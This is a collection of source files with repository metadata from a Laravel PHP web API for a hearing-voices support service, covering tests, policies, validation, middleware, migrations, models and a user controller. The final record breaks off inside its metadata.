"alpha_fraction": 0.6289855241775513,
"alphanum_fraction": 0.6294686198234558,
"avg_line_length": 27.75,
"blob_id": "ad1953aa4fa786743b84efcbda8f51b170352ce8",
"content_id": "4d0edb8fe781f572fc4dc3ae253fc7f469ad7f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2070,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 72,
"path": "/tests/Unit/Support/FilesystemTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Exceptions\\RiskyPathException;\nuse App\\Support\\Filesystem;\nuse Tests\\TestCase;\n\nclass FilesystemTest extends TestCase\n{\n /** @test */\n public function it_throws_an_exception_when_trying_to_clear_a_dir_not_in_the_storage_path(): void\n {\n $this->expectException(RiskyPathException::class);\n\n $filesystem = new Filesystem();\n\n $filesystem->clearDir('/tmp');\n }\n\n /** @test */\n public function it_does_nothing_if_the_directory_doesnt_exist(): void\n {\n $filsystem = new Filesystem();\n\n $result = $filsystem->clearDir(storage_path('testing/non_existent_directory'));\n\n $this->assertNull($result);\n }\n\n /** @test */\n public function it_clears_a_multi_level_directory(): void\n {\n mkdir(storage_path('testing/test_directory'));\n mkdir(storage_path('testing/test_directory/nested_directory'));\n file_put_contents(storage_path('testing/test_directory/test.txt'), 'Lorem ipsum');\n file_put_contents(storage_path('testing/test_directory/nested_directory/test.txt'), 'Lorem ipsum');\n\n $filesystem = new Filesystem();\n\n $filesystem->clearDir(storage_path('testing/test_directory'));\n\n $this->assertFalse(\n file_exists(storage_path('testing/test_directory/test.txt'))\n );\n $this->assertFalse(\n file_exists(storage_path('testing/test_directory/nested_directory/test.txt'))\n );\n }\n\n /**\n * Clean up the testing environment before the next test.\n *\n * @return void\n */\n protected function tearDown(): void\n {\n (new Filesystem())->clearDir(storage_path('testing/test_directory'));\n\n if (is_dir(storage_path('testing/test_directory/nested_directory'))) {\n rmdir(storage_path('testing/test_directory/nested_directory'));\n }\n\n if (is_dir(storage_path('testing/test_directory'))) {\n rmdir(storage_path('testing/test_directory'));\n }\n\n parent::tearDown();\n }\n}\n"
},
{
"alpha_fraction": 0.5660699009895325,
"alphanum_fraction": 0.5669224262237549,
"avg_line_length": 18.229507446289062,
"blob_id": "bab6d3e2cb8ff170aee59b6608cd109afc8b4cf7",
"content_id": "ed00c49d0ef9d43c8f234acce8018dd4fc67f159",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1173,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 61,
"path": "/app/Policies/TagPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Tag;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass TagPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list tags.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can view the tag.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\Tag $tag\n * @return bool\n */\n public function view(?User $user, Tag $tag): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can create the tag.\n *\n * @param \\App\\Models\\User $user\n *\n * @return bool\n */\n public function create(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can delete the tag.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Tag $tag\n * @return bool\n */\n public function delete(User $user, Tag $tag): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.7347972989082336,
"alphanum_fraction": 0.7398648858070374,
"avg_line_length": 25.909090042114258,
"blob_id": "c53df038b5d0811e66e9afe44712b3880d89d575",
"content_id": "fc80e78c07db63ac8826dc0ece507364445b3bdf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 592,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 22,
"path": "/app/Docs/Components.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Docs\\SecuritySchemes\\OAuth2SecurityScheme;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Components as BaseComponents;\n\nclass Components extends BaseComponents\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Components\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->securitySchemes(OAuth2SecurityScheme::create());\n }\n}\n"
},
{
"alpha_fraction": 0.502109706401825,
"alphanum_fraction": 0.5164557099342346,
"avg_line_length": 28.625,
"blob_id": "f8a5d53d9e926fa9fe985f9c68efaaf4c05e5254",
"content_id": "b4f55dac841516707594074e2648cfb3d76ccb1f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1185,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 40,
"path": "/app/Http/Requests/EndUser/UpdateEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Validation\\Rule;\n\nclass UpdateEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'email' => [\n 'bail',\n 'email',\n 'max:255',\n Rule::unique('users')->ignore($this->end_user->user_id),\n ],\n 'password' => ['bail', 'string', 'min:1', 'max:255'],\n 'country' => ['bail', 'string', 'max:255'],\n 'birth_year' => [\n 'bail',\n 'integer',\n Rule::min(Date::today()->year - Config::get('connecting_voices.age_requirement.max')),\n Rule::max(Date::today()->year - Config::get('connecting_voices.age_requirement.min')),\n ],\n 'gender' => ['bail', 'string', 'max:255'],\n 'ethnicity' => ['bail', 'string', 'max:255'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6094594597816467,
"alphanum_fraction": 0.6101351380348206,
"avg_line_length": 25.428571701049805,
"blob_id": "53ad340c4fed16fa884aeac6905a1045f0241eca",
"content_id": "e1b00d60b3f8fe30160dfe8ba73137d66137c2a0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1480,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 56,
"path": "/app/Http/Middleware/Authenticate.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Middleware;\n\nuse Illuminate\\Auth\\Middleware\\Authenticate as Middleware;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Str;\n\nclass Authenticate extends Middleware\n{\n /**\n * Get the path the user should be redirected to when they are not authenticated.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return string|void\n */\n protected function redirectTo($request)\n {\n if ($request->expectsJson()) {\n return;\n }\n\n return $this->isForAdmin($request)\n ? route('auth.admin.login')\n : route('auth.end-user.login');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return bool\n */\n protected function isForAdmin(Request $request): bool\n {\n // Check if the request contains an OAuth redirect URI for the admin web app.\n return Str::contains(\n $request->input('redirect_uri', ''),\n Config::get('connecting_voices.admin_url')\n );\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return bool\n */\n protected function isForEndUser(Request $request): bool\n {\n // Check if the request contains an OAuth redirect URI for the frontend web app.\n return Str::contains(\n $request->input('redirect_uri', ''),\n Config::get('connecting_voices.frontend_url')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5983999967575073,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 15.447368621826172,
"blob_id": "3c741c9ab76d1f6b373df5eeecfa9a0a624c25f1",
"content_id": "f78b4e17cfaf00033bd06e1812a2da20d93b0891",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Admin/AdminCreated.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Admin;\n\nuse App\\Models\\Admin;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass AdminCreated\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Admin\n */\n protected $admin;\n\n /**\n * AdminCreated constructor.\n *\n * @param \\App\\Models\\Admin $admin\n */\n public function __construct(Admin $admin)\n {\n $this->admin = $admin;\n }\n\n /**\n * @return \\App\\Models\\Admin\n */\n public function getAdmin(): Admin\n {\n return $this->admin;\n }\n}\n"
},
{
"alpha_fraction": 0.5722379684448242,
"alphanum_fraction": 0.5736544132232666,
"avg_line_length": 21.0625,
"blob_id": "f724d38e3da11c5a6b811e5269f7e7b98da88626",
"content_id": "b4c1f6d5338232a6b181cdf6d7a5d80069efe533",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 706,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 32,
"path": "/database/migrations/2019_05_31_100107_add_indexes_to_admins_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass AddIndexesToAdminsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::table('admins', function (Blueprint $table): void {\n $table->index('name');\n $table->index('phone');\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::table('admins', function (Blueprint $table): void {\n $table->dropIndex(['name']);\n $table->dropIndex(['phone']);\n });\n }\n}\n"
},
{
"alpha_fraction": 0.59375,
"alphanum_fraction": 0.595588207244873,
"avg_line_length": 21.66666603088379,
"blob_id": "2a6971a6ce35a36f04a8cded2e7ba10798b4048c",
"content_id": "812d87ff4449c43772556c846cff94e6590a6828",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 544,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 24,
"path": "/app/Http/Requests/EndUser/IndexEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass IndexEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'filter[email_verified]' => ['bail', Rule::in(['true', 'false', 'all'])],\n 'filter[with_soft_deletes]' => ['bail', Rule::in(['true', 'false'])],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5838218331336975,
"alphanum_fraction": 0.5849941372871399,
"avg_line_length": 24.08823585510254,
"blob_id": "8d3b4b8ed60ac4471b41523ad4d8d66ce2b0378e",
"content_id": "8d0b1019747bd90adce93b7d39f484790c091780",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 853,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/database/migrations/2019_12_09_184725_remove_unique_constraint_from_end_user_id_column_on_contributions_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass RemoveUniqueConstraintFromEndUserIdColumnOnContributionsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::table('contributions', function (Blueprint $table): void {\n $table->dropForeign(['end_user_id']);\n $table->dropUnique(['end_user_id']);\n $table->foreign('end_user_id')\n ->references('id')\n ->on('end_users');\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::table('contributions', function (Blueprint $table) {\n $table->unique('end_user_id');\n });\n }\n}\n"
},
{
"alpha_fraction": 0.6481481194496155,
"alphanum_fraction": 0.6507936716079712,
"avg_line_length": 24.200000762939453,
"blob_id": "607544df4880ebcf4652d40f9b66cbf1dce44b1a",
"content_id": "abe13fdd173ffff4749dc6fb85dbe9e93d63b6b1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 378,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 15,
"path": "/database/factories/NotificationFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Notification;\nuse Faker\\Generator as Faker;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Notification::class, function (Faker $faker): array {\n return [\n 'channel' => Notification::CHANNEL_EMAIL,\n 'recipient' => $faker->safeEmail,\n 'content' => $faker->sentence,\n ];\n});\n"
},
{
"alpha_fraction": 0.6845637559890747,
"alphanum_fraction": 0.6868008971214294,
"avg_line_length": 17.625,
"blob_id": "7a8230d6aadf063bed9d241fcf3b3b43e51ddf19",
"content_id": "5679f614273102541d6e054a65104bc7b86d2f86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 447,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 24,
"path": "/app/Models/Tag.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Database\\Eloquent\\SoftDeletes;\n\nclass Tag extends Model\n{\n use Mutators\\TagMutators;\n use Relationships\\TagRelationships;\n use Scopes\\TagScopes;\n use SoftDeletes;\n\n /**\n * @return bool\n */\n public function isTopLevel(): bool\n {\n return $this->parent_tag_id === null;\n }\n}\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5666666626930237,
"avg_line_length": 18.5,
"blob_id": "8acdb033aca1dba126294706e37d5568c232bf01",
"content_id": "a0247ae631801cd4e4f72bc66a334ac125308f0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 390,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 20,
"path": "/app/Sms/LogSmsSender.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nclass LogSmsSender implements SmsSender\n{\n /**\n * Sends an SMS.\n *\n * @param string $from\n * @param string $to\n * @param string $body\n */\n public function send(string $from, string $to, string $body): void\n {\n logger()->debug(\"Sms sent from [{$from}] to [{$to}] with message [{$body}].\");\n }\n}\n"
},
{
"alpha_fraction": 0.5687500238418579,
"alphanum_fraction": 0.5718749761581421,
"avg_line_length": 15,
"blob_id": "a063b0527c8bd883998dd7dfbc738239c020657e",
"content_id": "6f1b535e9f16ac483aaa522eefec067b97fefd1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 320,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 20,
"path": "/app/Sms/NullSmsSender.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nclass NullSmsSender implements SmsSender\n{\n /**\n * Sends an SMS.\n *\n * @param string $from\n * @param string $to\n * @param string $body\n */\n public function send(string $from, string $to, string $body): void\n {\n return;\n }\n}\n"
},
{
"alpha_fraction": 0.6376370191574097,
"alphanum_fraction": 0.6382460594177246,
"avg_line_length": 23.147058486938477,
"blob_id": "0dbf62f952ed95d1a1dbe3f38d64b0c41ff60338",
"content_id": "41562adc6c861cbe0aa7813571f0b828b0c2de94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1642,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 68,
"path": "/app/Http/Controllers/ApiController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Support\\Pagination;\nuse Illuminate\\Foundation\\Auth\\Access\\AuthorizesRequests;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Foundation\\Validation\\ValidatesRequests;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Routing\\Controller as BaseController;\nuse Illuminate\\Support\\Facades\\Auth;\nuse Illuminate\\Support\\Facades\\Config;\n\nabstract class ApiController extends BaseController\n{\n use AuthorizesRequests {\n AuthorizesRequests::resourceAbilityMap as baseResourceAbilityMap;\n }\n use DispatchesJobs;\n use ValidatesRequests;\n\n /**\n * @var int\n */\n protected $perPage;\n\n /**\n * Controller constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n $this->perPage = $pagination->perPage(\n $this->getPerPage($request)\n );\n\n Auth::shouldUse('api');\n }\n\n /**\n * Overridden to add the index method to the map.\n *\n * @return array\n */\n protected function resourceAbilityMap(): array\n {\n return array_merge([\n 'list' => 'list',\n 'index' => 'list',\n ], $this->baseResourceAbilityMap());\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return int\n */\n protected function getPerPage(Request $request): int\n {\n return (int)$request->input(\n 'per_page',\n Config::get('connecting_voices.pagination.default')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5728155374526978,
"alphanum_fraction": 0.5841423869132996,
"avg_line_length": 18.3125,
"blob_id": "2ece28ec7b0ad8490b432f7d5c2b8f96b340541d",
"content_id": "3b8b4852bea8b644dad0db5def55794f3d6249f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 32,
"path": "/app/Rules/UkPhoneNumber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass UkPhoneNumber implements Rule\n{\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $phone\n * @return bool\n */\n public function passes($attribute, $phone): bool\n {\n return preg_match('/^(0[0-9]{10})$/', $phone) === 1;\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return 'The :attribute must be a valid UK phone number.';\n }\n}\n"
},
{
"alpha_fraction": 0.5851119160652161,
"alphanum_fraction": 0.5871941447257996,
"avg_line_length": 21.080459594726562,
"blob_id": "419f9d97fea796ee5920cbe888881709b3699d83",
"content_id": "f6ebf429f3a0d1dee85c0dd0660e0789f3a7a3e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1921,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 87,
"path": "/app/Models/Contribution.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Support\\Markdown;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Support\\Str;\n\nclass Contribution extends Model\n{\n use Mutators\\ContributionMutators;\n use Relationships\\ContributionRelationships;\n use Scopes\\ContributionScopes;\n\n const STATUS_PUBLIC = 'public';\n const STATUS_PRIVATE = 'private';\n const STATUS_IN_REVIEW = 'in_review';\n const STATUS_CHANGES_REQUESTED = 'changes_requested';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'status_last_updated_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n ];\n\n /**\n * @return bool\n */\n public function isPublic(): bool\n {\n return $this->status === static::STATUS_PUBLIC;\n }\n\n /**\n * @return bool\n */\n public function isPrivate(): bool\n {\n return $this->status === static::STATUS_PRIVATE;\n }\n\n /**\n * @return bool\n */\n public function isInReview(): bool\n {\n return $this->status === static::STATUS_IN_REVIEW;\n }\n\n /**\n * @return bool\n */\n public function isChangesRequested(): bool\n {\n return $this->status === static::STATUS_CHANGES_REQUESTED;\n }\n\n /**\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function belongsToEndUser(EndUser $endUser): bool\n {\n return $this->end_user_id === $endUser->id;\n }\n\n /**\n * @return string\n */\n public function getExcerpt(): string\n {\n // TODO: Apply better logic here so words aren't cut off.\n\n /** @var \\App\\Support\\Markdown $markdown */\n $markdown = app()->get(Markdown::class);\n $content = $markdown->strip($this->content);\n\n return Str::limit($content, 125);\n }\n}\n"
},
{
"alpha_fraction": 0.6635730862617493,
"alphanum_fraction": 0.6693735718727112,
"avg_line_length": 29.785715103149414,
"blob_id": "0805ed3c2ad4f8a21a57ecb613a03944b6270f5a",
"content_id": "99301ab11b33872621979d53cf990eddfadeb7a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 862,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 28,
"path": "/app/Docs/SecuritySchemes/OAuth2SecurityScheme.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\SecuritySchemes;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\OAuthFlow;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityScheme;\n\nclass OAuth2SecurityScheme extends SecurityScheme\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityScheme\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create('OAuth2')\n ->type(static::TYPE_OAUTH2)\n ->description('The standard OAuth2 authentication')\n ->flows(\n OAuthFlow::create()\n ->flow(OAuthFlow::FLOW_IMPLICIT)\n ->authorizationUrl(route('passport.authorizations.authorize'))\n );\n }\n}\n"
},
{
"alpha_fraction": 0.614478349685669,
"alphanum_fraction": 0.6147884130477905,
"avg_line_length": 34.64088439941406,
"blob_id": "ff4c874ebfa020e5262796770a9e1451f1bc1704",
"content_id": "75924c7319f2395983e8bffcc5c725b26429e423",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 6451,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 181,
"path": "/app/Http/Controllers/V1/EndUserController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\EndUser\\EmailFilter;\nuse App\\Http\\Filters\\EndUser\\EmailVerifiedFilter;\nuse App\\Http\\Filters\\NullFilter;\nuse App\\Http\\Requests\\EndUser\\DestroyEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\IndexEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\StoreEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\UpdateEndUserRequest;\nuse App\\Http\\Resources\\EndUserResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Http\\Sorts\\EndUser\\EmailSort;\nuse App\\Models\\EndUser;\nuse App\\Services\\EndUserService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\nuse Spatie\\QueryBuilder\\Sort;\n\nclass EndUserController extends ApiController\n{\n /**\n * @var \\App\\Services\\EndUserService\n */\n protected $endUserService;\n\n /**\n * EndUserController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\EndUserService $endUserService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n EndUserService $endUserService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('store');\n $this->authorizeResource(EndUser::class);\n\n $this->endUserService = $endUserService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\IndexEndUserRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(IndexEndUserRequest $request): ResourceCollection\n {\n $baseQuery = EndUser::query()\n ->with('user')\n // When soft deleted users aren't included, then only get end users with an active user.\n ->when(\n $request->doesntHaveFilter('with_soft_deletes', 'true'),\n function (Builder $query) use ($request): void {\n $query->whereHas('user', function (Builder $query): void {\n $query->whereNull('users.deleted_at');\n });\n }\n )\n ->withCount(\n 'contributions',\n 'publicContributions',\n 'privateContributions',\n 'inReviewContributions',\n 'changesRequestedContributions'\n );\n\n $endUsers = QueryBuilder::for($baseQuery)\n ->allowedFilters(\n Filter::exact('id'),\n Filter::custom('email', EmailFilter::class),\n Filter::custom('email_verified', EmailVerifiedFilter::class),\n Filter::custom('with_soft_deletes', NullFilter::class)\n )\n ->allowedSorts([\n Sort::custom('email', EmailSort::class),\n ])\n ->defaultSort(\n Sort::custom('email', EmailSort::class)\n )\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all end users.'));\n\n return EndUserResource::collection($endUsers);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\StoreEndUserRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreEndUserRequest $request): JsonResource\n {\n $endUser = DB::transaction(function () use ($request): EndUser {\n return $this->endUserService->create([\n 'email' => $request->email,\n 'password' => $request->password,\n 'country' => $request->country,\n 'birth_year' => $request->birth_year,\n 'gender' => $request->gender,\n 'ethnicity' => $request->ethnicity,\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, EndUser $endUser): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\UpdateEndUserRequest $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(UpdateEndUserRequest $request, EndUser $endUser): JsonResource\n {\n $endUser = DB::transaction(function () use ($request, $endUser): EndUser {\n return $this->endUserService->update($endUser, [\n 'email' => $request->email,\n 'password' => $request->password,\n 'country' => $request->country,\n 'birth_year' => $request->birth_year,\n 'gender' => $request->gender,\n 'ethnicity' => $request->ethnicity,\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\DestroyEndUserRequest $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(\n DestroyEndUserRequest $request,\n EndUser $endUser\n ): ResourceDeletedResponse {\n DB::transaction(function () use ($request, $endUser): void {\n $request->type === DestroyEndUserRequest::TYPE_FORCE_DELETE\n ? $this->endUserService->forceDelete($endUser)\n : $this->endUserService->softDelete($endUser);\n });\n\n $request->type === DestroyEndUserRequest::TYPE_FORCE_DELETE\n ? event(EndpointInvoked::onDelete($request, \"Force deleted end user [{$endUser->id}].\"))\n : event(EndpointInvoked::onDelete($request, \"Soft deleted end user [{$endUser->id}].\"));\n\n return new ResourceDeletedResponse('end user');\n }\n}\n"
},
{
"alpha_fraction": 0.6824644804000854,
"alphanum_fraction": 0.6824644804000854,
"avg_line_length": 24.31999969482422,
"blob_id": "d36b8e0f5345c9452ff9fe603d3fc8be81338e4f",
"content_id": "4334eeaf6635a494fd0e4c4a987bd656b08f1f94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 633,
